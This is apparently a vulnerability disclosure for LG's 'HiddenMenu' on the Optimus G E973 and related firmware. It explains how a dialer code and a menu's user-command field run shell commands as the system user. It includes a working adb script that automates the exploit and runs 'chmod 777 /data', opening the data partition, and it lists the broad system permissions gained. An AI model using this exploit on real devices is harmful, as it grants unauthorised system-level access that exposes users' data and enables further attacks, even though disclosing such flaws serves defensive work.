Device: LG Optimus G E973 (Others affected) Firmware: Android 4.1.2 JZO54k (Others affected) Evidence: http://youtu.be/ZfbDIpTY-t4 A vulnerability in LG's "HiddenMenu" allows you to execute shell commands as the system, with a large array of additional permissions (Groups). This vulnerability opens up the device to further attacks. Due to the large number of models sharing similar firmware, I have no idea how many devices are affected. Details: Dial: 3845#*XXX# ( XXX to be replaced with model number, in this case 3845#*973#) HiddenMenu will open, select WLAN Test, then select Wi-Fi Ping Test/User Command, then select User Command. Replace the tcpdump command with the command you wish to run as system user Then press cancel (not ok). The application will execute the command as system user. Automated version (chmod 777 /data): #!/bin/sh adb shell ls -l /data adb shell input tap 45 1200 adb shell input tap 700 500 adb shell input tap 350 800 adb shell input tap 35 700 adb shell input tap 350 700 adb shell input tap 700 1000 adb shell input tap 35 1000 adb shell input tap 700 800 adb shell input tap 35 800 adb shell input tap 700 500 adb shell input tap 700 1000 adb shell input tap 700 900 adb shell input tap 700 900 adb shell input tap 700 300 max=46 count=1 while [[ $count -le $max ]] do adb shell input keyevent 67 ((count++)) done adb shell input text chmod adb shell input keyevent 62 adb shell input text 777 adb shell input keyevent 62 adb shell input text "/data" adb shell input tap 600 600 adb shell ls -l /data Additional permissions granted to vulnerable application: "android.permission.REBOOT" "android.permission.WRITE_EXTERNAL_STORAGE" "android.permission.BLUETOOTH" "android.permission.BLUETOOTH_ADMIN" "android.permission.DEVICE_POWER" "android.permission.WRITE_SETTINGS" "android.permission.READ_SETTINGS" "android.permission.READ_CONTACTS" "android.permission.WRITE_CONTACTS" "android.permission.HARDWARE_TEST" "android.permission.VIBRATE" "android.permission.WRITE_APN_SETTINGS" "android.permission.ACCESS_WIFI_STATE" "android.permission.CHANGE_WIFI_STATE" "android.permission.FLASHLIGHT" "android.permission.READ_ERS" "android.permission.WRITE_ERS" "android.permission.MASTER_CLEAR" "android.permission.MODIFY_AUDIO_SETTINGS" "android.permission.ACCESS_COARSE_LOCATION" "android.permission.ACCESS_FINE_LOCATION" "android.permission.ACCESS_LOCATION_EXTRA_COMMANDS" "android.permission.INTERNET" "android.permission.BLUETOOTH" "android.permission.BLUETOOTH_ADMIN" "com.lge.permission.LGSystemDB_READ" "com.lge.permission.LGSystemDB_WRITE" "android.permission.MOUNT_UNMOUNT_FILESYSTEMS" "android.permission.ACCESS_LGDRM" "android.permission.DISABLE_KEYGUARD" "android.permission.CAMERA" "android.permission.WAKE_LOCK" "android.permission.WRITE_SETTINGS" "android.permission.VIBRATE" "android.permission.ACCESS_FINE_LOCATION" "android.permission.WRITE_EXTERNAL_STORAGE" "android.permission.CAMERA" "android.permission.RECORD_AUDIO" "android.permission.DISABLE_KEYGUARD" "android.permission.MODIFY_AUDIO_SETTINGS" "android.permission.WRITE_SETTINGS" "android.permission.WAKE_LOCK" "android.permission.SET_TIME" "com.android.providers.syncml.permission.READ_SYNCML_PROFILE" "com.android.providers.syncml.permission.WRITE_SYNCML_PROFILE" "com.lge.permission.FACTORY" "com.lge.permission.ACCESS_LGFOTA" "android.permission.ACCESS_CACHE_FILESYSTEM" "com.lge.permission.WV_PROVISION" "com.lge.permission.PR_PROVISION" "android.permission.READ_EXTERNAL_STORAGE" "android.permission.CHANGE_NETWORK_STATE" "com.lge.permission.LGHIDDEN"